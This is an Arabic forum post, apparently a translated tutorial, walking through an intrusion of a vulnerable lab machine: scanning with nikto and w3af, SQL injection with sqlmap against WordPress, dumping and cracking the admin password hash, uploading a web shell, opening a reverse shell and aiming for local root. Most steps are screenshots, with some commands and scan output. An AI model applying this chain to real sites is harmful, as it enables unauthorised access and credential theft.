حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    استهداف موقع :فحصة :اختراقة برايفت


    السلام عليكم ورحمة الله وبركاتة

    اليوم ياخوان راح نشرح باذن الله
    فحص الهدف من الثغرات وحصول ثغرة sql
    واستغلالها ورفع الشل وسحب روت :

    الهدف : &:"

    hack-test.com


    في البداية نتجى لم مجلد اداة nikto

    بلباك تراك :/pentest/web/nikto

    بدعها نفحص الهدف: #:"

    perl nikto.pl -h 301 Moved Permanently

    [​IMG]

    كود PHP:
    + Target IP: 192.168.1.2
    + Target Hostname: hack-test.com
    + Target Port: 80
    + Start Time: 2011-12-29 06:50:03

    ---------------------------------------------------------------------------

    +
    Server: Apache/2.2.15 (Fedora)
    +
    ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
    +
    Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-3268: /icons/: Directory indexing found.
    +
    OSVDB-3233: /icons/README: Apache default file found.
    +
    6448 items checked: 1 error(s) and 6 item(s) reported on remote host
    + End Time: 2011-12-29 06:50:37 (34 seconds)


    نجمع معلومات عن الهدف:

    بعد الانتهاء
    نروح لم اداة
    w3af
    الكل عارفها:
    مجلد الاداة
    /pentest/web/w3af

    بعد دخولنا للمجد :
    نشغل البرنامج

    ./w3af_gui

    [​IMG]

    http://resources.infosecinstitute.com/wp-content/uploads
    /010512_1633_Targetingan13.png

    الان بعد مانتهينا من الفحص
    [​IMG]

    خرجت لنا الثغرات : &:"
    اخترقنا ثغرة sql
    [​IMG]
    مثل ماهو موضح قدامك :ماكن الاصابة

    [​IMG]

    طيب الحين نتوجة لم الاداة المعروفة :
    sqlmap
    [​IMG]

    نعطية امر :
    sqlmap.py -u 404 Not Found

    لستغلال الثغرة
    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]
    هينا اخترنا وريد بريس
    [​IMG]
    معروف انو جدول اليوزر في سكريبت وريد بريس هو )2:"
    wp_user
    [​IMG]
    [​IMG]
    مثل ماشفتو تم استخراج الجداول:
    [​IMG]
    ومثل ماشفتو تم سحب باسورد الادمن :
    الحين نروح نكسر الهاش من الموقع
    http://www.onlinehashcrack.com/free-hash-reverse.php
    [​IMG]
    الحين نروح نخش الوحة
    [​IMG]
    نرفع الشل
    [​IMG]
    [​IMG]
    [​IMG]
    تم رفع الشل بنجاح :
    [​IMG]
    [​IMG]
    عملنا اتصال عكسي
    [​IMG]
    [​IMG]

    نشوف صلاحيتنا :id

    uid=48(apache) gid=489(apache) groups=489(apache)

    مسارنا : pwd

    /var/www/html/Hackademic_RTB1/wp-content/plugins

    uname -a

    اصدال الكيرنل

    Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

    [​IMG]

    الحين نروح نسحب لوكل روت :عشان نسحب روت [​IMG]

    [​IMG]

    الى هنا اخواني :ملاحضة بسيطة الشرح شرح اجنبي ورتبته لكم :عشان الافادة )4:"



    المصدر: شبكة عراق تيم IQ-TEAM

    hsji]ht l,ru :tpwm :hojvhrm fvhdtj ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة